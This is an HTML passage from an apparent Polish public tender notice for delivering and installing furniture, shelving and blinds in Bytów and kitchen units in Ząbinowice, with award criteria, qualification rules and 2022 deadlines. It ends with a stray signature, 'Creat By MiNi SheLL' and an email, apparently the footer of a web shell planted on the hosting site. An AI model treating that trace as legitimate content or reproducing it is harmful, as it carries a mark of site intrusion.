(włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie ze SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III zamówienia <br/>W ramach realizacji przedmiotu części III zamówienia wymagana jest dostawa i montaż mebli do punktu świadczenia usług społecznych przy ul. Młyńskiej 8 w Bytowie: <br/>- zestaw A według załączników graficznych stanowiących Załączniki nr 11 i nr 12 do SWZ, w stylu loftowym, rama stalowa z rury 20/20 mm, kolor ciemny grafit, zestaw składający się z szafy ubraniowej trzysegmentowej, przy czym jeden segment to regał o szerokości 60 cm, z czterema półkami, przesłonięty drzewami, drugi to otwarty regał o szerokości 70 cm z czterema półkami, a ostatni segment to szafa o szerokości 60 cm, z półką i wysuwanym relingiem do wieszania ubrań, przesłonięta drzwiami; wysokość całkowita szafy to 166 cm, długość 190 cm, głębokość 40 cm, dwie pary drzwi jednoskrzydłowych o wymiarach 60 cm na 166 cm, wewnątrz część z relingiem o wysokości 123 cm, reling stalowy, wysuwany, u góry półka o wys. 25 cm; meble należy zamontować <br/>w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 11 do SWZ, zgodnie z zasadami montażu mebli, dół szafek należy zabezpieczyć listwami maskującymi, ramy mebli wykonane z rury stalowej 20/20 mm, kolor ciemny grafit, korpusy i fronty szafek z płyty laminowanej, kolor jednolity szary, fronty lakierowane matowe, uchwyty listwowe, kolor naturalny stalowy, podobnie drążek na ubrania,<br/>- zestaw E według załączników graficznych stanowiących Załączniki nr 11 i nr 12 do SWZ, w stylu loftowym, rama stalowa z rury 20/20 mm, kolor ciemny grafit, zestaw składający się z biurka o długości 160 cm, wysokości 75 cm i głębokości 80 cm, prostopadle do biurka pod blatem szafka o długości 80 cm, wysokości 60 cm i głębokości 40 cm, z wydzieloną częścią na komputer o długości 35 cm i częścią <br/>o szerokości 45 cm z szufladą o wysokości 12 cm i szafką o wysokości 34 cm, dodatkowo regał wiszący o długości 140 cm, wysokości 57 cm i głębokości 30 cm, przedzielony wzdłuż <br/>i poprzecznie, tworząc dwie dolne półki o wym. 70 cm długości i 17 cm wysokości oraz dwie górne o długości 70 cm i wysokości 34 cm, meble należy zamontować w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 11 do SWZ, zgodnie z zasadami montażu mebli, dół szafek należy zabezpieczyć listwami maskującymi, kolorystyka blatu ciemny grafit, blat z laminatu HPL, ramy mebli wykonane z rury stalowej 20/20 mm, kolor ciemny grafit, korpusy i fronty szafek kolor z płyty laminowanej, jednolity szary, fronty lakierowane matowe, uchwyty listwowe, kolor naturalny stalowy,<br/>- 3 szt. krzesła biurowe dla osób dorosłych, stalowy stelaż, gładka tapicerka w kolorze czarnym, regulowana wysokość całkowita, wysokość i kąt oparcia, wysokość do siedziska, owalne oparcie, kółka plastikowe podwójne, elementy stalowe osłonięte plastikowymi zabezpieczeniami,<br/><br/>- 9 szt. regały otwarte, stalowe w kolorze ciemny grafit, o szerokości 80 cm, długości 120 cm, wysokości 200 cm, z trzema półkami, na trzech poziomach, kryty od góry, udźwig każdej <br/>z półek minimum 150 kg, wysokość między półkami minimum 70 cm, możliwość regulacji wysokości półek, możliwość umieszczenia palety z każdej strony (bez zabudowanych ścian);<br/>- 6 rolet plisowanych na wymiar, mocowanie inwazyjne, tkanina plisowana, kolor jasny szary, przepuszczalna w około 50 %, perłowa powłoka odbijająca światło, wymiary okien: 3 szt. otwierane: 128x190cm, 1 szt. nieotwierane 128x190cm, 2 szt. okno otwierane 128x214cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie ze SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV zamówienia<br/>W ramach realizacji przedmiotu części IV zamówienia wymagana jest dostawa i montaż mebli do świetlicy w Zabinowicach 19.<br/>Rodzaj zakupu	Ilość	Parametry<br/>Meble kuchenne do świetlicy w miejscowości Ząbinowice<br/>fronty i korpusy wykonane z płyty laminowanej, blaty z laminatu HPL, zgodnie z lokalizacją wskazaną <br/>w załączniku graficznym stanowiącym Załącznik nr 13 do SWZ, całość z blatem roboczym, jednolitym, zlew wokół zasilikonowany bezbarwnym silikonem, bateria kuchenna nablatowa z mieszadłem, wylewka ruchoma, z nakładką napowietrzającą wodę, blat zabezpieczony listwami plastikowymi od ścian oraz listwami zakończeniowymi, meble należy zamontować w miejscach wskazanych na rysunku pomocniczym stanowiącym Załącznik nr 13 do SWZ, zgodnie z zasadami montażu mebli, dół szafek należy zabezpieczyć listwami maskującymi o szerokości 10 cm, kolorystyka blatu ciemny grafit, korpusy i fronty szafek kolor jednolity szary, fronty lakierowane matowe, uchwyty listwowe, kolor naturalny stalowy (nie dotyczy mebli stalowych)<br/>A szafka dolna ‘60’	2	dolna, o szerokości 60 cm, długości 60 cm, wysokości 85 cm, z trzema szufladami, przy czym pierwsza szuflada z plastikowym wkładem na sztućce, <br/>B szafka dolna ‘60’	1	dolna, o szerokości 60 cm, długości 40 cm, wysokości 85 cm, z trzema szufladami, <br/>C szafka dolna ‘60’	1	dolna, o szerokości i długości 60 cm, wysokości 85 cm, drzwi prawe, z miejscem na butlę gazową, wentylowana<br/>D szafka dolna ‘60’	3	dolna o szerokości 60 cm, długości 60 cm, wysokości 85 cm, z szufladą na sztućce (bez wkładu), poniżej dwie półki zamknięte, drzwi prawe<br/>E szafka dolna ‘80’	1	dolna, o szerokości 80 cm, długości 60 cm, wysokości 85 cm, dwudrzwiowa, ze zlewem nakładanym na blat<br/>F szafka dolna ‘80’	1	dolna o szerokości 80 cm, długości 60 cm, wysokości 85 cm, z szufladą na sztućce (bez wkładu), poniżej dwie półki zamknięte, drzwi prawe<br/>G szafka wisząca ‘60’	6	wisząca, o szerokości 60 cm, długości 30 cm i wysokości 94 cm, z dwoma półkami, każda półka z oddzielnymi uchylnymi od dołu drzwiami,<br/>H szafka wisząca ‘80’	1	wisząca o szerokości 80 cm, długości 30 cm i wysokości 94 cm, dwudrzwiowa, z ociekaczem dwupoziomowym i zbiornikiem na wodę,<br/>I szafka wisząca ‘60’	3	wisząca o szerokości 60 cm, długości 30 cm i wysokości 94 cm, z dwoma półkami, każda półka z oddzielnymi uchylnymi od dołu drzwiami, dolne drzwi witrynowe – szkło mleczne białe, jednolite<br/>J szafka wisząca ‘80’	1	wisząca o szerokości 80 cm, długości 30 cm i wysokości 94 cm, z dwoma półkami, każda półka z oddzielnymi uchylnymi od dołu drzwiami, dolne drzwi witrynowe – szkło mleczne białe, jednolite<br/>K blat roboczy	1	blat roboczy przyścienny, nierdzewny, stalowy o wymiarach 60 cm szerokości, 180 cm długości, 85 cm wysokości, konstrukcja stalowa, ustawiany nad grzejnikiem (konstrukcja musi omijać grzejnik)<br/>L dostawka 1	dostawka przyścienna, nierdzewna, stalowa o wymiarach 40 cm szerokości, 60 cm długości, 85 cm wysokości, na nóżkach, z zamykanymi dwiema półkami, drzwi prawe<br/>M dostawka na kółkach	1	dostawka stalowa, nierdzewna, o wymiarach 70 cm szerokości, 90 cm długości, 85 cm wysokości, nóżki z kółkami, z zamontowanym hamulcem na co najmniej dwóch nóżkach, z otwartą półką </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie ze SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projekcie umowy stanowiącym Załącznik nr 4 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ust. 2 p.z.p. oraz wskazanym w projekcie umowy stanowiącym Załącznik nr 4 do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-01 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com